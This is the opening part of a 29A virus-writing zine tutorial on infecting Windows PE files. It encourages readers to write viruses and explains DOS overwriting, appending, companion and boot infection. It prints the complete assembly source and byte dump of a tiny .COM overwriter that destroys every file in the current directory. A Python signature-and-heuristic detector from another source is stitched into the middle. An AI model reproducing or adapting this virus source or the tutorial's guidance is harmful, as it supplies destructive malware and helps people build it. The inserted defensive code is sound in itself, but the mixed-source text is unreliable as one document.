29a-7.023
==========================================
=== PE INFECTION TUTORIAL FOR BEGINNER ===
==========================================
ART #1 : FIRST WORDS
ART #2 : VIEW OF THE PAST
ART #3 : YOUR FIRST PROGRAM IN WIN32
ART #4 : PE FILE FORMAT
ART #5 : ACCESSING WIN32 API
ART #6 : HOW TO USE SOME APIS
ART #7 : DELTA OFFSET
ART #8 : RETURN TO THE HOST
ART #9 : TIPS n' TRICKS
          CODE SECTION WRITEABLE
          REDUCE YOUR CODE
          COMPRESSED PE FILE
=============================================================
+ ________ +
+ /\ |---\ | | | /| +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | / | +
+ /------\ | \ | --+----+-- | +
+ / \ | \ | | | | +
+ +
=============================================================
FIRST WORDS
So you want to code your own WIN32 virus ! ! ! If you are not stupid, if you
are patient and if you really want to do it, then you can write a WIN32 virus
in asm language..... But first you should answer this stupid question:
WHY DO YOU WANT TO DO IT !!!!?
- To destroy files?
- To kill all the BIOS of the universe?
- To fuck Micro$oft OS?
- Because it's only a challenge for you?
- To proclaim a message of peace to the world?
If you chose one of the first three answers, then you should phone a
psychiatrist ! ! ! ! ! But if you want to proclaim a message of peace
then you are welcome in the vx coding world...
Writing a virus is forbidden, so you should be prudent, and you had better
not ask stupid questions. See the law texts about computing.
What you should have:
-A brain. (Logical, and equipped with the "English language" option)
-A computer.
-Patience.
-An assembler (TASM, NASM, MASM...) and its docs. I prefer NASM....
 (with NASM you can code for UNIX n' WIN32 platforms, NASM is open
 source!!!) (MASM means 'Micro$oft ASM'... no comment...)
-An asm file editor (of course you can just use NOTEPAD...)
 but see QEDITOR.EXE in the MASM pack
-A good hex editor (WINHEX)
What you should find:
-Tutorials for the asm language if you have no knowledge about it.
-Virus tutorials and Vx zines. Download:
   -40Hex zines : Old zines (a lot of articles for DOS)
   -29A zines : Very very interesting zines.
   -SLAM zines : essentially for macro viruses.
   -Vx tazy zine : A very cool zine. Thanks dear Lord Julus
   -Vdat : Big collection of vx articles. By Cicatrix
   -...
-Documentation about file formats (PE EXE, see PECOFF.DOC from Micro$oft).
-Doc about how to use WIN32 APIs (WIN32.HLP).
You should read all you will find about vx coding, read, read and read....
=============================================================
+ ________ __ +
+ /\ |---\ | | | / \ +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | / +
+ /------\ | \ | --+----+-- / +
+ / \ | \ | | | /___ +
+ +
=============================================================
A VIEW OF THE PAST
Here I will speak about the old DOS viruses:
DOS IS DEAD !!! I loved DOS because it was my first OS on an old 186 with
a 'Hercules' graphic card ;-)
Writing a simple DOS virus is very, very, very easy... I've learned vx coding with
some old tutorials (40Hex...)
Common target files for viruses:
- *.COM
- *.EXE
- *.SYS
- *.DOC
- *.ZIP *.ARJ *.ARC, all compressed archive files.
- *.OBJ *.ASM ;-)
Methods of infection:
* overwriting
* non-overwriting (appending)
* companion
* BOOT infector
OVERWRITING VIRUS (*.COM infector):
They were very destructive because they copy themselves over the host, and the
infected file will never run again:
Before infection After infection
+---------------+ +---------------+
| F F F F F F | | V I R U S |
| I I I I I I | +---------------+
| L L L L L L | | L L L L L L |
| E E E E E E | | E E E E E E |
+---------------+ +---------------+
NON-OVERWRITING VIRUS (*.COM infector only):
This virus doesn't destroy the infected file, so it can spread as it wants.
Before infection After infection
+---------------+ ---->-- +---------------+ <-- +---------------+
| F F F F F F | | --<-| JMP to VIRUS | <-- | F F F F F F |
| I I I I I I | | | | | <-- | I I I I I I |
| L L L L L L | | | +---------------+ +---------------+
| E E E E E E | | | | L L L L L L | |
+---------------+ | | | E E E E E E | |
| | +---------------+ |
| -->-| INFECT FILES | |
| +---------------+ |
| | RESTORE THE | |
| | FIRST OVER- |--->-------/
| | WRITED BYTES |
| +---------------+
----<---|JMP to the host|
+---------------+
The virus copies itself to the end of the host and overwrites the first bytes
with a JMP opcode to the virus; it infects other files, restores the
first overwritten bytes, and jumps to the host (beginning of the file)...
COMPANION VIRUS:
We find some companion viruses in WIN32 too, but they appeared under DOS:
- When you type c:\my_prog
   -DOS searches first for c:\my_prog.COM
   -DOS searches next for c:\my_prog.EXE if c:\my_prog.COM is not found
   -DOS searches next for c:\my_prog.BAT if c:\my_prog.EXE is not found
   -DOS prints "file not found" on screen if c:\my_prog.BAT is not found
- So the companion virus searches for my_prog.EXE; if it is present, it creates a
  my_prog.COM and copies itself into my_prog.COM
So after infection, if you type c:\my_prog then my_prog.COM (the virus)
is run first, and the virus runs my_prog.EXE... CLEAR?
BOOT infector:
These viruses infect the master boot record of a floppy or a hard drive. They were
powerful because the virus runs before the Operating System. Writing a
BOOT virus is not so easy in WIN32 because we are in protected mode.
I will now show you a very tiny overwriting virus (.COM infector):
;--------------------------------------------------------------------
; The EXEcution III Virus.
;
; Well, you're now the proud owner of the smallest virus ever made!
; only 23 bytes long and of course again very lame..
; But what the heck, it's just an educational piece of code!!
;
; (C) 1993 by [D郣kR郰] of TridenT (Ooooooranje Boooooooven!)
;
; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his
; nice try to make the smallest (27 bytes and 25 bytes) virus... gotcha!! ;-))
;
; BTW Don't forget, I only tested it under DOS 5.0 so on other versions
; it might not work!

_CODE   SEGMENT
        ASSUME  CS:_CODE
        ORG     100h

START:                          ; That's where we're starting...
FILE    DB      '*.*',0h        ; Dummy instruction, SUB's 0FFh from CH
        MOV     AH,4Eh          ; Let's search!
DO_IT:  MOV     DX,SI           ; Make DX = 100h (offset file)
        INT     21h             ; Search now dude!
        MOV     AX,3D01h        ; Hmm, infect that fucking file!
        MOV     DX,9Eh          ; Name is at DS:[9Eh]
        INT     21h             ; Go do it!
        XCHG    BX,AX           ; Put the handle in BX
        MOV     AH,40h          ; Write myself!
        JMP     DO_IT           ; Use other routine

_CODE   ENDS
        END     START

; If you don't like my english: Get lost, you can understand it!
;-------------------------------------------------------------------------
This virus overwrites every file (*.*) it finds, in the current directory only.
It looks like:
2A 2E 2A 00 B4 4E 8B D6 CD 21 B8 01 3D BA 9E 00 CD 21 93 B4 40 EB EF
very tiny, isn't it?
It was a challenge under DOS to code the smallest virus... strange game !
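The three DOS infection patterns described in this part (overwriter, appending JMP-to-tail infector, and .COM/.EXE companion) each leave a recognisable trace, and the 23-byte dump above is a usable exact signature. The following Python is an added example from the defender's side and is not part of the 29A article; the sample files are constructed in memory, and the "last quarter of the file" threshold is an assumed heuristic, not a rule from the text.

```python
import os
import struct

# Byte image of the EXEcution III overwriter exactly as dumped in the article.
EXECUTION_III = bytes.fromhex("2A2E2A00B44E8BD6CD21B8013DBA9E00CD2193B440EBEF")


def has_execution_iii(data: bytes) -> bool:
    """Exact-signature check. The overwriter writes its own image over the
    start of every file it opens, so an infected file begins with these bytes."""
    return data.startswith(EXECUTION_III)


def appender_jmp_suspicious(data: bytes, tail_fraction: float = 0.25) -> bool:
    """Heuristic for appending .COM infectors: the host's first instruction has
    been replaced by JMP rel16 (opcode E9) whose target lands in the file's
    tail, where the appended body lives. tail_fraction is an assumed threshold."""
    if len(data) < 3 or data[0] != 0xE9:
        return False
    rel = struct.unpack_from("<h", data, 1)[0]
    # A .COM is loaded at CS:100h; the 3-byte JMP ends at file offset 3,
    # so its target expressed as a file offset is 3 + rel.
    target = 3 + rel
    return 0 < target < len(data) and target >= len(data) * (1 - tail_fraction)


def companion_pairs(names) -> list:
    """Companion heuristic: a .COM sharing its stem with an .EXE in one directory.
    DOS tries .COM before .EXE, which is exactly what the companion relies on.
    Legitimate pairs exist, so this only flags candidates for inspection."""
    exts_by_stem = {}
    for name in names:
        stem, ext = os.path.splitext(name.lower())
        exts_by_stem.setdefault(stem, set()).add(ext)
    return sorted(s for s, exts in exts_by_stem.items() if {".com", ".exe"} <= exts)


# Constructed samples (not real files): an EXEcution III victim, a clean .COM that
# just exits (MOV AH,4Ch / INT 21h), and a 1000-byte .COM patched to jump to a
# 100-byte "virus body" appended at offset 900 (rel = 900 - 3 = 897).
INFECTED_SAMPLE = EXECUTION_III + b"\x00" * 200
CLEAN_SAMPLE = bytes.fromhex("B44CCD21") + b"\x00" * 60
APPENDED_SAMPLE = b"\xE9" + struct.pack("<h", 897) + b"\x90" * 897 + b"V" * 100
DIR_LISTING = ["MY_PROG.EXE", "MY_PROG.COM", "README.TXT", "TOOL.EXE"]

if __name__ == "__main__":
    print("EXEcution III signature:", has_execution_iii(INFECTED_SAMPLE))
    print("appender-style JMP:", appender_jmp_suspicious(APPENDED_SAMPLE))
    print("companion candidates:", companion_pairs(DIR_LISTING))
```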
=============================================================
+ ________ ___ +
+ /\ |---\ | | | / \ +
+ / \ | | | --+----+-- / | +
+ / \ |___/ | | | __/ +
+ /------\ | \ | --+----+-- \ +
+ / \ | \ | | | \ | +
+ \___/ +
=============================================================
YOUR FIRST WIN32 PROGRAM